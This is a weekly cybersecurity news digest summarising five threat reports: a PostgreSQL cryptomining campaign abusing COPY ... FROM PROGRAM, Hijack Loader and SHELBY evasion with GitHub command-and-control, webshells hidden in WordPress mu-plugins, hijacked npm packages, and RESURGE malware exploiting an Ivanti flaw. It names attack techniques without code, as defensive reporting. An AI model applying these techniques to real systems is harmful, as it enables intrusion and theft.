03/26/2025-04/02/2025 Over 1,500 PostgreSQL Servers Compromised, New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor And More.

1. Over 1,500 PostgreSQL Servers Compromised in Fileless Cryptocurrency Mining Campaign

An ongoing campaign targets exposed PostgreSQL instances to deploy cryptocurrency miners, with over 1,500 victims reported. The attackers use PG_MEM malware and employ defense evasion techniques like fileless miner payloads and unique binary hashes per target.

The campaign exploits weak PostgreSQL configurations, using the COPY ... FROM PROGRAM command to run arbitrary shell commands. The attackers deploy a Base64-encoded shell script to disable competing miners and drop PG_CORE, along with an obfuscated Golang binary named postmaster. This binary creates a cron job for persistence, elevates privileges, and downloads the XMRig miner. Each compromised machine is assigned a unique mining worker, with the campaign reportedly utilizing over 1,500 machines across multiple wallets.

2. New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor for Stealth

Cybersecurity researchers have found an updated version of Hijack Loader, a malware loader that introduces new evasion techniques and enhances persistence. The loader now includes call stack spoofing to hide the origin of function calls and performs anti-VM checks to detect sandbox environments. First discovered in 2023, Hijack Loader delivers second-stage payloads like information stealers and bypasses security software.

The latest iteration includes improvements like call stack spoofing to conceal malicious calls, using fabricated stack frames. It also integrates the Heaven’s Gate technique for process injection and delays execution by blocking Avast Antivirus processes. Two new modules, ANTIVM and modTask, enhance detection evasion and establish persistence through scheduled tasks.

Meanwhile, Elastic Security Labs revealed a new malware family, SHELBY, which uses GitHub for command-and-control and data exfiltration. The loader communicates via commits to a private repository, allowing attackers to send commands and access data without leaving detectable traces on disk.

3. Hackers Abuse WordPress MU-Plugins to Hide Malicious Code

Hackers are increasingly using the WordPress mu-plugins directory to run malicious code on every page load, evading detection. This method involves three types of malicious code planted in the ‘wp-content/mu-plugins/’ folder, which runs automatically without activation from the admin dashboard.

Mu-plugins can be used for legitimate functions, but their automatic execution makes them ideal for stealthy attacks. Sucuri identified three payloads:

1. redirect.php – Redirects users to a fake browser update site to download malware.
2. index.php – A webshell that fetches and executes PHP code remotely.
3. custom-js-loader.php – Injects malicious JavaScript to hijack images and links.

These attacks can steal credentials, harm a site’s reputation, and install malware. To prevent infections, Sucuri advises updating plugins, disabling unnecessary ones, and using strong passwords with multi-factor authentication.

4. Multiple npm Crypto Packages Hijacked

Sonatype has uncovered multiple hijacked npm cryptocurrency packages designed to steal sensitive information like API keys and SSH keys. These packages, some of which have been on npm for up to 9 years, were recently updated with malicious, obfuscated scripts.

The hijacked packages, tracked as sonatype-2025-000924, include scripts that exfiltrate sensitive data to a remote server after installation. Notably, some packages had not been updated in years, like “bnb-javascript-sdk-nobroadcast,” which received a malicious release.

Sonatype researchers suspect the hijacks may be the result of compromised npm maintainer accounts, possibly due to credential stuffing or expired domain takeovers. This incident highlights the importance of securing developer accounts with two-factor authentication (2FA) and improving supply chain security practices. Developers must remain vigilant in monitoring third-party software registries to mitigate risks associated with malicious updates in open-source packages.

5. RESURGE Malware Exploits Ivanti Flaw with Rootkit and Web Shell Features

CISA has uncovered a new malware called RESURGE, exploiting a now-patched vulnerability in Ivanti Connect Secure (ICS) appliances. RESURGE, which includes features of the SPAWNCHIMERA malware, has distinct commands altering its behavior and capabilities such as a rootkit, dropper, backdoor, proxy, and tunneler. The security flaw (CVE-2025-0282) affects several Ivanti products and could allow remote code execution. It has been weaponized to deliver the SPAWN ecosystem, linked to a China-based espionage group, UNC5337. SPAWNCHIMERA, the previous malware variant, was observed being used to patch this vulnerability.

RESURGE includes features like web shell deployment, credential harvesting, and manipulation of integrity checks. CISA also discovered two other malicious artifacts on compromised ICS devices. Organizations are urged to patch Ivanti systems, reset credentials, and monitor accounts for anomalous activity.